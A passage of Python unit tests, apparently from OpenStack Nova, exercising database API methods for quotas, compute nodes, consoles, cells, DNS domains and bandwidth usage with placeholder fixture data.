def test_calculate_overquota_per_project_quota_overquota(self):
# In this test, user quotas are fine but project quotas are over.
resource = 'foo'
project_usages = {resource: {'total': 10}}
user_usages = {resource: {'total': 5}}
self._test_calculate_overquota(resource, project_usages, user_usages)
def test_calculate_overquota_per_user_quota_overquota(self):
# In this test, project quotas are fine but user quotas are over.
resource = 'foo'
project_usages = {resource: {'total': 5}}
user_usages = {resource: {'total': 10}}
self._test_calculate_overquota(resource, project_usages, user_usages)
class QuotaClassTestCase(test.TestCase, ModelsObjectComparatorMixin):
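"""Tests for db.api.quota_class_* methods."""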
def setUp(self):
super(QuotaClassTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_quota_class_get_default(self):
params = {
'test_resource1': '10',
'test_resource2': '20',
'test_resource3': '30',
}
for res, limit in params.items():
db.quota_class_create(self.ctxt, 'default', res, limit)
defaults = db.quota_class_get_default(self.ctxt)
self.assertEqual(defaults, dict(class_name='default',
test_resource1=10,
test_resource2=20,
test_resource3=30))
def test_quota_class_create(self):
qc = db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
self.assertEqual(qc.class_name, 'class name')
self.assertEqual(qc.resource, 'resource')
self.assertEqual(qc.hard_limit, 42)
def test_quota_class_get(self):
qc = db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
qc_db = db.quota_class_get(self.ctxt, 'class name', 'resource')
self._assertEqualObjects(qc, qc_db)
def test_quota_class_get_nonexistent(self):
self.assertRaises(exception.QuotaClassNotFound, db.quota_class_get,
self.ctxt, 'nonexistent', 'resource')
def test_quota_class_get_all_by_name(self):
for i in range(3):
for j in range(3):
db.quota_class_create(self.ctxt, 'class%d' % i,
'resource%d' % j, j)
for i in range(3):
classes = db.quota_class_get_all_by_name(self.ctxt, 'class%d' % i)
self.assertEqual(classes, {'class_name': 'class%d' % i,
'resource0': 0, 'resource1': 1, 'resource2': 2})
def test_quota_class_update(self):
db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
db.quota_class_update(self.ctxt, 'class name', 'resource', 43)
self.assertEqual(db.quota_class_get(self.ctxt, 'class name',
'resource').hard_limit, 43)
def test_quota_class_update_nonexistent(self):
self.assertRaises(exception.QuotaClassNotFound, db.quota_class_update,
self.ctxt, 'class name', 'resource', 42)
def test_refresh_quota_usages(self):
# Smoke test that the helper applies the given values to a plain mock.
quota_usages = mock.Mock()
sqlalchemy_api._refresh_quota_usages(quota_usages, until_refresh=5,
in_use=6)
self.assertEqual(6, quota_usages.in_use)
self.assertEqual(5, quota_usages.until_refresh)
class S3ImageTestCase(test.TestCase):
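"""Tests for db.api.s3_image_* methods."""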
def setUp(self):
super(S3ImageTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.values = [uuidutils.generate_uuid() for i in xrange(3)]
self.images = [db.s3_image_create(self.ctxt, uuid)
for uuid in self.values]
def test_s3_image_create(self):
for ref in self.images:
self.assertTrue(uuidutils.is_uuid_like(ref.uuid))
self.assertEqual(sorted(self.values),
sorted([ref.uuid for ref in self.images]))
def test_s3_image_get_by_uuid(self):
for uuid in self.values:
ref = db.s3_image_get_by_uuid(self.ctxt, uuid)
self.assertTrue(uuidutils.is_uuid_like(ref.uuid))
self.assertEqual(uuid, ref.uuid)
def test_s3_image_get(self):
self.assertEqual(sorted(self.values),
sorted([db.s3_image_get(self.ctxt, ref.id).uuid
for ref in self.images]))
def test_s3_image_get_not_found(self):
self.assertRaises(exception.ImageNotFound, db.s3_image_get, self.ctxt,
100500)
def test_s3_image_get_by_uuid_not_found(self):
self.assertRaises(exception.ImageNotFound, db.s3_image_get_by_uuid,
self.ctxt, uuidutils.generate_uuid())
class ComputeNodeTestCase(test.TestCase, ModelsObjectComparatorMixin):
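"""Tests for db.api.compute_node_* methods."""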
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(ComputeNodeTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.service_dict = dict(host='host1', binary='nova-compute',
topic=CONF.compute_topic, report_count=1,
disabled=False)
self.service = db.service_create(self.ctxt, self.service_dict)
self.compute_node_dict = dict(vcpus=2, memory_mb=1024, local_gb=2048,
vcpus_used=0, memory_mb_used=0,
local_gb_used=0, free_ram_mb=1024,
free_disk_gb=2048, hypervisor_type="xen",
hypervisor_version=1, cpu_info="",
running_vms=0, current_workload=0,
service_id=self.service['id'],
host=self.service['host'],
disk_available_least=100,
hypervisor_hostname='abracadabra104',
host_ip='127.0.0.1',
supported_instances='',
pci_stats='',
metrics='',
extra_resources='',
stats='', numa_topology='')
# add some random stats
self.stats = dict(num_instances=3, num_proj_12345=2,
num_proj_23456=2, num_vm_building=3)
self.compute_node_dict['stats'] = jsonutils.dumps(self.stats)
self.flags(reserved_host_memory_mb=0)
self.flags(reserved_host_disk_mb=0)
self.item = db.compute_node_create(self.ctxt, self.compute_node_dict)
def test_compute_node_create(self):
self._assertEqualObjects(self.compute_node_dict, self.item,
ignored_keys=self._ignored_keys + ['stats'])
new_stats = jsonutils.loads(self.item['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_get_all(self):
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(1, len(nodes))
node = nodes[0]
self._assertEqualObjects(self.compute_node_dict, node,
ignored_keys=self._ignored_keys +
['stats', 'service'])
new_stats = jsonutils.loads(node['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_get_all_deleted_compute_node(self):
# Create a service and compute node and ensure we can find its stats;
# delete the service and compute node when done and loop again
for x in range(2, 5):
# Create a service
service_data = self.service_dict.copy()
service_data['host'] = 'host-%s' % x
service = db.service_create(self.ctxt, service_data)
# Create a compute node
compute_node_data = self.compute_node_dict.copy()
compute_node_data['service_id'] = service['id']
compute_node_data['stats'] = jsonutils.dumps(self.stats.copy())
compute_node_data['hypervisor_hostname'] = 'hypervisor-%s' % x
node = db.compute_node_create(self.ctxt, compute_node_data)
# Ensure the "new" compute node is found
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(2, len(nodes))
found = None
for n in nodes:
if n['id'] == node['id']:
found = n
break
self.assertIsNotNone(found)
# Now ensure the match has stats!
self.assertNotEqual(jsonutils.loads(found['stats']), {})
# Now delete the newly-created compute node to ensure the related
# compute node stats are wiped in a cascaded fashion
db.compute_node_delete(self.ctxt, node['id'])
# Clean up the service
db.service_destroy(self.ctxt, service['id'])
def test_compute_node_get_all_mult_compute_nodes_one_service_entry(self):
service_data = self.service_dict.copy()
service_data['host'] = 'host2'
service = db.service_create(self.ctxt, service_data)
existing_node = dict(self.item.iteritems())
expected = [existing_node]
for name in ['bm_node1', 'bm_node2']:
compute_node_data = self.compute_node_dict.copy()
compute_node_data['service_id'] = service['id']
compute_node_data['stats'] = jsonutils.dumps(self.stats)
compute_node_data['hypervisor_hostname'] = name
node = db.compute_node_create(self.ctxt, compute_node_data)
node = dict(node.iteritems())
expected.append(node)
result = sorted(db.compute_node_get_all(self.ctxt),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_node_get_all_by_host_with_distinct_hosts(self):
# Create another service with another node
service2 = self.service_dict.copy()
service2['host'] = 'host2'
db.service_create(self.ctxt, service2)
compute_node_another_host = self.compute_node_dict.copy()
compute_node_another_host['stats'] = jsonutils.dumps(self.stats)
compute_node_another_host['hypervisor_hostname'] = 'node_2'
compute_node_another_host['host'] = 'host2'
node = db.compute_node_create(self.ctxt, compute_node_another_host)
result = db.compute_node_get_all_by_host(self.ctxt, 'host1', False)
self._assertEqualListsOfObjects([self.item], result)
result = db.compute_node_get_all_by_host(self.ctxt, 'host2', False)
self._assertEqualListsOfObjects([node], result)
def test_compute_node_get_all_by_host_with_same_host(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_3'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = [self.item, node]
result = sorted(db.compute_node_get_all_by_host(
self.ctxt, 'host1', False),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_node_get_all_by_host_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get_all_by_host, self.ctxt, 'wrong')
def test_compute_nodes_get_by_service_id_one_result(self):
expected = [self.item]
result = db.compute_nodes_get_by_service_id(
self.ctxt, self.service['id'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_nodes_get_by_service_id_multiple_results(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_2'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = [self.item, node]
result = sorted(db.compute_nodes_get_by_service_id(
self.ctxt, self.service['id']),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_nodes_get_by_service_id_not_found(self):
self.assertRaises(exception.ServiceNotFound,
db.compute_nodes_get_by_service_id, self.ctxt,
'fake')
def test_compute_node_get_by_host_and_nodename(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_2'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = node
result = db.compute_node_get_by_host_and_nodename(
self.ctxt, 'host1', 'node_2')
self._assertEqualObjects(expected, result)
def test_compute_node_get_by_host_and_nodename_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get_by_host_and_nodename,
self.ctxt, 'host1', 'wrong')
def test_compute_node_get(self):
compute_node_id = self.item['id']
node = db.compute_node_get(self.ctxt, compute_node_id)
self._assertEqualObjects(self.compute_node_dict, node,
ignored_keys=self._ignored_keys + ['stats', 'service'])
new_stats = jsonutils.loads(node['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_update(self):
compute_node_id = self.item['id']
stats = jsonutils.loads(self.item['stats'])
# change some values:
stats['num_instances'] = 8
stats['num_tribbles'] = 1
values = {
'vcpus': 4,
'stats': jsonutils.dumps(stats),
}
item_updated = db.compute_node_update(self.ctxt, compute_node_id,
values)
self.assertEqual(4, item_updated['vcpus'])
new_stats = jsonutils.loads(item_updated['stats'])
self.assertEqual(stats, new_stats)
def test_compute_node_delete(self):
compute_node_id = self.item['id']
db.compute_node_delete(self.ctxt, compute_node_id)
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(len(nodes), 0)
def test_compute_node_search_by_hypervisor(self):
nodes_created = []
new_service = copy.copy(self.service_dict)
for i in xrange(3):
new_service['binary'] += str(i)
new_service['topic'] += str(i)
service = db.service_create(self.ctxt, new_service)
self.compute_node_dict['service_id'] = service['id']
self.compute_node_dict['hypervisor_hostname'] = 'testhost' + str(i)
self.compute_node_dict['stats'] = jsonutils.dumps(self.stats)
node = db.compute_node_create(self.ctxt, self.compute_node_dict)
nodes_created.append(node)
nodes = db.compute_node_search_by_hypervisor(self.ctxt, 'host')
self.assertEqual(3, len(nodes))
self._assertEqualListsOfObjects(nodes_created, nodes,
ignored_keys=self._ignored_keys + ['stats', 'service'])
def test_compute_node_statistics(self):
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(stats.pop('count'), 1)
for k, v in stats.iteritems():
self.assertEqual(v, self.item[k])
def test_compute_node_statistics_disabled_service(self):
serv = db.service_get_by_host_and_topic(
self.ctxt, 'host1', CONF.compute_topic)
db.service_update(self.ctxt, serv['id'], {'disabled': True})
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(stats.pop('count'), 0)
def test_compute_node_statistics_with_old_service_id(self):
# NOTE(sbauza): This test is only for checking backwards compatibility
# with old versions of compute_nodes not providing host column.
# This test could be removed once we are sure that all compute nodes
# are populating the host field thanks to the ResourceTracker
service2 = self.service_dict.copy()
service2['host'] = 'host2'
db_service2 = db.service_create(self.ctxt, service2)
compute_node_old_host = self.compute_node_dict.copy()
compute_node_old_host['stats'] = jsonutils.dumps(self.stats)
compute_node_old_host['hypervisor_hostname'] = 'node_2'
compute_node_old_host['service_id'] = db_service2['id']
compute_node_old_host.pop('host')
db.compute_node_create(self.ctxt, compute_node_old_host)
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(2, stats.pop('count'))
def test_compute_node_statistics_with_other_service(self):
other_service = self.service_dict.copy()
other_service['topic'] = 'fake-topic'
other_service['binary'] = 'nova-fake'
db.service_create(self.ctxt, other_service)
stats = db.compute_node_statistics(self.ctxt)
data = {'count': 1,
'vcpus_used': 0,
'local_gb_used': 0,
'memory_mb': 1024,
'current_workload': 0,
'vcpus': 2,
'running_vms': 0,
'free_disk_gb': 2048,
'disk_available_least': 100,
'local_gb': 2048,
'free_ram_mb': 1024,
'memory_mb_used': 0}
for key, value in six.iteritems(data):
self.assertEqual(value, stats.pop(key))
def test_compute_node_not_found(self):
self.assertRaises(exception.ComputeHostNotFound, db.compute_node_get,
self.ctxt, 100500)
def test_compute_node_update_always_updates_updated_at(self):
item_updated = db.compute_node_update(self.ctxt,
self.item['id'], {})
self.assertNotEqual(self.item['updated_at'],
item_updated['updated_at'])
def test_compute_node_update_override_updated_at(self):
# Update the record once so updated_at is set.
first = db.compute_node_update(self.ctxt, self.item['id'],
{'free_ram_mb': '12'})
self.assertIsNotNone(first['updated_at'])
# Update a second time. Make sure that the updated_at value we send
# is overridden.
second = db.compute_node_update(self.ctxt, self.item['id'],
{'updated_at': first.updated_at,
'free_ram_mb': '13'})
self.assertNotEqual(first['updated_at'], second['updated_at'])
def test_service_destroy_with_compute_node(self):
db.service_destroy(self.ctxt, self.service['id'])
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get, self.ctxt,
self.item['id'])
def test_service_destroy_with_old_compute_node(self):
# NOTE(sbauza): This test is only for checking backwards compatibility
# with old versions of compute_nodes not providing host column.
# This test could be removed once we are sure that all compute nodes
# are populating the host field thanks to the ResourceTracker
compute_node_old_host_dict = self.compute_node_dict.copy()
compute_node_old_host_dict.pop('host')
item_old = db.compute_node_create(self.ctxt,
compute_node_old_host_dict)
db.service_destroy(self.ctxt, self.service['id'])
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get, self.ctxt,
item_old['id'])
class ProviderFwRuleTestCase(test.TestCase, ModelsObjectComparatorMixin):
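"""Tests for db.api.provider_fw_rule_* methods."""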
def setUp(self):
super(ProviderFwRuleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.values = self._get_rule_values()
self.rules = [db.provider_fw_rule_create(self.ctxt, rule)
for rule in self.values]
def _get_rule_values(self):
cidr_samples = ['192.168.0.0/24', '10.1.2.3/32',
'2001:4f8:3:ba::/64',
'2001:4f8:3:ba:2e0:81ff:fe22:d1f1/128']
values = []
for i in xrange(len(cidr_samples)):
rule = {}
rule['protocol'] = 'foo' + str(i)
rule['from_port'] = 9999 + i
rule['to_port'] = 9898 + i
rule['cidr'] = cidr_samples[i]
values.append(rule)
return values
def test_provider_fw_rule_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for i, rule in enumerate(self.values):
self._assertEqualObjects(self.rules[i], rule,
ignored_keys=ignored_keys)
def test_provider_fw_rule_get_all(self):
self._assertEqualListsOfObjects(self.rules,
db.provider_fw_rule_get_all(self.ctxt))
def test_provider_fw_rule_destroy(self):
for rule in self.rules:
db.provider_fw_rule_destroy(self.ctxt, rule.id)
self.assertEqual([], db.provider_fw_rule_get_all(self.ctxt))
class CertificateTestCase(test.TestCase, ModelsObjectComparatorMixin):
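"""Tests for db.api.certificate_* methods."""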
def setUp(self):
super(CertificateTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.created = self._certificates_create()
def _get_certs_values(self):
base_values = {
'user_id': 'user',
'project_id': 'project',
'file_name': 'filename'
}
return [{k: v + str(x) for k, v in base_values.iteritems()}
for x in xrange(1, 4)]
def _certificates_create(self):
return [db.certificate_create(self.ctxt, cert)
for cert in self._get_certs_values()]
def test_certificate_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for i, cert in enumerate(self._get_certs_values()):
self._assertEqualObjects(self.created[i], cert,
ignored_keys=ignored_keys)
def test_certificate_get_all_by_project(self):
cert = db.certificate_get_all_by_project(self.ctxt,
self.created[1].project_id)
self._assertEqualObjects(self.created[1], cert[0])
def test_certificate_get_all_by_user(self):
cert = db.certificate_get_all_by_user(self.ctxt,
self.created[1].user_id)
self._assertEqualObjects(self.created[1], cert[0])
def test_certificate_get_all_by_user_and_project(self):
cert = db.certificate_get_all_by_user_and_project(self.ctxt,
self.created[1].user_id, self.created[1].project_id)
self._assertEqualObjects(self.created[1], cert[0])
class ConsoleTestCase(test.TestCase, ModelsObjectComparatorMixin):
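"""Tests for db.api.console_* methods."""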
def setUp(self):
super(ConsoleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
pools_data = [
{'address': '192.168.10.10',
'username': 'user1',
'password': 'passwd1',
'console_type': 'type1',
'public_hostname': 'public_host1',
'host': 'host1',
'compute_host': 'compute_host1',
},
{'address': '192.168.10.11',
'username': 'user2',
'password': 'passwd2',
'console_type': 'type2',
'public_hostname': 'public_host2',
'host': 'host2',
'compute_host': 'compute_host2',
},
]
self.console_pools = [db.console_pool_create(self.ctxt, val)
for val in pools_data]
instance_uuid = uuidutils.generate_uuid()
db.instance_create(self.ctxt, {'uuid': instance_uuid})
self.console_data = [{'instance_name': 'name' + str(x),
'instance_uuid': instance_uuid,
'password': 'pass' + str(x),
'port': 7878 + x,
'pool_id': self.console_pools[x]['id']}
for x in xrange(len(pools_data))]
self.consoles = [db.console_create(self.ctxt, val)
for val in self.console_data]
def test_console_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for console in self.consoles:
self.assertIsNotNone(console['id'])
self._assertEqualListsOfObjects(self.console_data, self.consoles,
ignored_keys=ignored_keys)
def test_console_get_by_id(self):
console = self.consoles[0]
console_get = db.console_get(self.ctxt, console['id'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_by_id_uuid(self):
console = self.consoles[0]
console_get = db.console_get(self.ctxt, console['id'],
console['instance_uuid'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_by_pool_instance(self):
console = self.consoles[0]
console_get = db.console_get_by_pool_instance(self.ctxt,
console['pool_id'], console['instance_uuid'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_all_by_instance(self):
instance_uuid = self.consoles[0]['instance_uuid']
consoles_get = db.console_get_all_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfObjects(self.consoles, consoles_get)
def test_console_get_all_by_instance_with_pool(self):
instance_uuid = self.consoles[0]['instance_uuid']
consoles_get = db.console_get_all_by_instance(self.ctxt, instance_uuid,
columns_to_join=['pool'])
self._assertEqualListsOfObjects(self.consoles, consoles_get,
ignored_keys=['pool'])
self._assertEqualListsOfObjects(self.console_pools,
[c['pool'] for c in consoles_get])
def test_console_get_all_by_instance_empty(self):
consoles_get = db.console_get_all_by_instance(self.ctxt,
uuidutils.generate_uuid())
self.assertEqual(consoles_get, [])
def test_console_delete(self):
console_id = self.consoles[0]['id']
db.console_delete(self.ctxt, console_id)
self.assertRaises(exception.ConsoleNotFound, db.console_get,
self.ctxt, console_id)
def test_console_get_by_pool_instance_not_found(self):
self.assertRaises(exception.ConsoleNotFoundInPoolForInstance,
db.console_get_by_pool_instance, self.ctxt,
self.consoles[0]['pool_id'],
uuidutils.generate_uuid())
def test_console_get_not_found(self):
self.assertRaises(exception.ConsoleNotFound, db.console_get,
self.ctxt, 100500)
def test_console_get_not_found_instance(self):
self.assertRaises(exception.ConsoleNotFoundForInstance, db.console_get,
self.ctxt, self.consoles[0]['id'],
uuidutils.generate_uuid())
class CellTestCase(test.TestCase, ModelsObjectComparatorMixin):
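"""Tests for db.api.cell_* methods."""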
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(CellTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_cell_base_values(self):
return {
'name': 'myname',
'api_url': 'apiurl',
'transport_url': 'transporturl',
'weight_offset': 0.5,
'weight_scale': 1.5,
'is_parent': True,
}
def _cell_value_modify(self, value, step):
if isinstance(value, str):
return value + str(step)
elif isinstance(value, float):
return value + step + 0.6
elif isinstance(value, bool):
return bool(step % 2)
elif isinstance(value, int):
return value + step
def _create_cells(self):
test_values = []
for x in xrange(1, 4):
modified_val = {k: self._cell_value_modify(v, x)
for k, v in self._get_cell_base_values().iteritems()}
db.cell_create(self.ctxt, modified_val)
test_values.append(modified_val)
return test_values
def test_cell_create(self):
cell = db.cell_create(self.ctxt, self._get_cell_base_values())
self.assertIsNotNone(cell['id'])
self._assertEqualObjects(cell, self._get_cell_base_values(),
ignored_keys=self._ignored_keys)
def test_cell_update(self):
db.cell_create(self.ctxt, self._get_cell_base_values())
new_values = {
'api_url': 'apiurl1',
'transport_url': 'transporturl1',
'weight_offset': 0.6,
'weight_scale': 1.6,
'is_parent': False,
}
test_cellname = self._get_cell_base_values()['name']
updated_cell = db.cell_update(self.ctxt, test_cellname, new_values)
self._assertEqualObjects(updated_cell, new_values,
ignored_keys=self._ignored_keys + ['name'])
def test_cell_delete(self):
new_cells = self._create_cells()
for cell in new_cells:
test_cellname = cell['name']
db.cell_delete(self.ctxt, test_cellname)
self.assertRaises(exception.CellNotFound, db.cell_get, self.ctxt,
test_cellname)
def test_cell_get(self):
new_cells = self._create_cells()
for cell in new_cells:
cell_get = db.cell_get(self.ctxt, cell['name'])
self._assertEqualObjects(cell_get, cell,
ignored_keys=self._ignored_keys)
def test_cell_get_all(self):
new_cells = self._create_cells()
cells = db.cell_get_all(self.ctxt)
self.assertEqual(len(new_cells), len(cells))
cells_byname = {newcell['name']: newcell
for newcell in new_cells}
for cell in cells:
self._assertEqualObjects(cell, cells_byname[cell['name']],
self._ignored_keys)
def test_cell_get_not_found(self):
self._create_cells()
self.assertRaises(exception.CellNotFound, db.cell_get, self.ctxt,
'cellnotinbase')
def test_cell_update_not_found(self):
self._create_cells()
self.assertRaises(exception.CellNotFound, db.cell_update, self.ctxt,
'cellnotinbase', self._get_cell_base_values())
def test_cell_create_exists(self):
db.cell_create(self.ctxt, self._get_cell_base_values())
self.assertRaises(exception.CellExists, db.cell_create,
self.ctxt, self._get_cell_base_values())
class ConsolePoolTestCase(test.TestCase, ModelsObjectComparatorMixin):
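"""Tests for db.api.console_pool_* methods."""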
def setUp(self):
super(ConsolePoolTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.test_console_pool_1 = {
'address': '192.168.2.10',
'username': 'user_1',
'password': 'secret_123',
'console_type': 'type_1',
'public_hostname': 'public_hostname_123',
'host': 'localhost',
'compute_host': '127.0.0.1',
}
self.test_console_pool_2 = {
'address': '192.168.2.11',
'username': 'user_2',
'password': 'secret_1234',
'console_type': 'type_2',
'public_hostname': 'public_hostname_1234',
'host': '127.0.0.1',
'compute_host': 'localhost',
}
self.test_console_pool_3 = {
'address': '192.168.2.12',
'username': 'user_3',
'password': 'secret_12345',
'console_type': 'type_2',
'public_hostname': 'public_hostname_12345',
'host': '127.0.0.1',
'compute_host': '192.168.1.1',
}
def test_console_pool_create(self):
console_pool = db.console_pool_create(
self.ctxt, self.test_console_pool_1)
self.assertIsNotNone(console_pool.get('id'))
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(
console_pool, self.test_console_pool_1, ignored_keys)
def test_console_pool_create_duplicate(self):
db.console_pool_create(self.ctxt, self.test_console_pool_1)
self.assertRaises(exception.ConsolePoolExists, db.console_pool_create,
self.ctxt, self.test_console_pool_1)
def test_console_pool_get_by_host_type(self):
params = [
self.test_console_pool_1,
self.test_console_pool_2,
]
for p in params:
db.console_pool_create(self.ctxt, p)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id', 'consoles']
cp = self.test_console_pool_1
db_cp = db.console_pool_get_by_host_type(
self.ctxt, cp['compute_host'], cp['host'], cp['console_type']
)
self._assertEqualObjects(cp, db_cp, ignored_keys)
def test_console_pool_get_by_host_type_no_results(self):
self.assertRaises(
exception.ConsolePoolNotFoundForHostType,
db.console_pool_get_by_host_type, self.ctxt, 'compute_host',
'host', 'console_type')
def test_console_pool_get_all_by_host_type(self):
params = [
self.test_console_pool_1,
self.test_console_pool_2,
self.test_console_pool_3,
]
for p in params:
db.console_pool_create(self.ctxt, p)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id', 'consoles']
cp = self.test_console_pool_2
db_cp = db.console_pool_get_all_by_host_type(
self.ctxt, cp['host'], cp['console_type'])
self._assertEqualListsOfObjects(
db_cp, [self.test_console_pool_2, self.test_console_pool_3],
ignored_keys)
def test_console_pool_get_all_by_host_type_no_results(self):
res = db.console_pool_get_all_by_host_type(
self.ctxt, 'cp_host', 'cp_console_type')
self.assertEqual([], res)
class DnsdomainTestCase(test.TestCase):
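"""Tests for db.api.dnsdomain_* methods."""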
def setUp(self):
super(DnsdomainTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.domain = 'test.domain'
self.testzone = 'testzone'
self.project = 'fake'
def test_dnsdomain_register_for_zone(self):
db.dnsdomain_register_for_zone(self.ctxt, self.domain, self.testzone)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertEqual(domain['domain'], self.domain)
self.assertEqual(domain['availability_zone'], self.testzone)
self.assertEqual(domain['scope'], 'private')
def test_dnsdomain_register_for_project(self):
db.dnsdomain_register_for_project(self.ctxt, self.domain, self.project)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertEqual(domain['domain'], self.domain)
self.assertEqual(domain['project_id'], self.project)
self.assertEqual(domain['scope'], 'public')
def test_dnsdomain_unregister(self):
db.dnsdomain_register_for_zone(self.ctxt, self.domain, self.testzone)
db.dnsdomain_unregister(self.ctxt, self.domain)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertIsNone(domain)
def test_dnsdomain_get_all(self):
d_list = ['test.domain.one', 'test.domain.two']
db.dnsdomain_register_for_zone(self.ctxt, d_list[0], 'zone')
db.dnsdomain_register_for_zone(self.ctxt, d_list[1], 'zone')
db_list = db.dnsdomain_get_all(self.ctxt)
db_domain_list = [d.domain for d in db_list]
self.assertEqual(sorted(d_list), sorted(db_domain_list))
class BwUsageTestCase(test.TestCase, ModelsObjectComparatorMixin):
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(BwUsageTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.useFixture(test.TimeOverride())
def test_bw_usage_get_by_uuids(self):
now = timeutils.utcnow()
start_period = now - datetime.timedelta(seconds=10)
uuid3_refreshed = now - datetime.timedelta(seconds=5)
expected_bw_usages = {
'fake_uuid1': {'uuid': 'fake_uuid1',
'mac': 'fake_mac1',
'start_period': start_period,
'bw_in': 100,
'bw_out': 200,
'last_ctr_in': 12345,
'last_ctr_out': 67890,
'last_refreshed': now},
'fake_uuid2': {'uuid': 'fake_uuid2',
'mac': 'fake_mac2',
'start_period': start_period,
'bw_in': 200,
'bw_out': 300,
'last_ctr_in': 22345,
'last_ctr_out': 77890,
'last_refreshed': now},
'fake_uuid3': {'uuid': 'fake_uuid3',
'mac': 'fake_mac3',
'start_period': start_period,
'bw_in': 400,
'bw_out': 500,
'last_ctr_in': 32345,
'last_ctr_out': 87890,
'last_refreshed': uuid3_refreshed}
}
bw_usages = db.bw_usage_get_by_uuids(self.ctxt,
['fake_uuid1', 'fake_uuid2'], start_period)
# No matches
self.assertEqual(len(bw_usages), 0)
# Add 3 entries
db.bw_usage_update(self.ctxt, 'fake_uuid1',
'fake_mac1', start_period,
100, 200, 12345, 67890)
db.bw_usage_update(self.ctxt, 'fake_uuid2',
'fake_mac2', start_period,
100, 200, 42, 42)
# Test explicit refreshed time
db.bw_usage_update(self.ctxt, 'fake_uuid3',
'fake_mac3', start_period,
400, 500, 32345, 87890,
last_refreshed=uuid3_refreshed)
# Update 2nd entry
db.bw_usage_update(self.ctxt, 'fake_uuid2',
'fake_mac2', start_period,
200, 300, 22345, 77890)
bw_usages = db.bw_usage_get_by_uuids(self.ctxt,
['fake_uuid1', 'fake_uuid2', 'fake_uuid3'], start_period)
self.assertEqual(len(bw_usages), 3)
for usage in bw_usages:
self._assertEqualObjects(expected_bw_usages[usage['uuid']], usage,
ignored_keys=self._ignored_keys)
def test_bw_usage_get(self):
now = timeutils.utcnow()
start_period = now - datetime.timedelta(seconds=10)
expected_bw_usage = {'uuid': 'fake_uuid1',
'mac': 'fake_mac1',
'start_period': start_period,
'bw_in': 100,
'bw_out': 200,
'last_ctr_in': 12345,
'last_ctr_out': 67890,
'last_refreshed': now}
bw_usage = db.bw_usage_get(self.ctxt, 'fake_uuid1', start_period,
'fake_mac1')
self.assertIsNone(bw_usage)
db.bw_usage_update(self.ctxt, 'fake_uuid1',
'fake_mac1', start_period,
100, 200, 12345, 67890)
bw_usage = db.bw_usage_get(self.ctxt, 'fake_uuid1', start_period,
'fake_mac1')
self._assertEqualObjects(bw_usage, expected_bw_usage,
ignored_keys=self._ignored_keys)
class Ec2TestCase(test.TestCase):
def setUp(self):
super(Ec2TestCase, self).setUp()
self.ctxt = context.RequestContext('fake_user', 'fake_project')
def test_ec2_ids_not_found_are_printable(self):
def check_exc_format(method, value):
try:
method(self.ctxt, value)
except exception.NotFound as exc:
self.assertIn(six.text_type(value), six.text_type(exc))
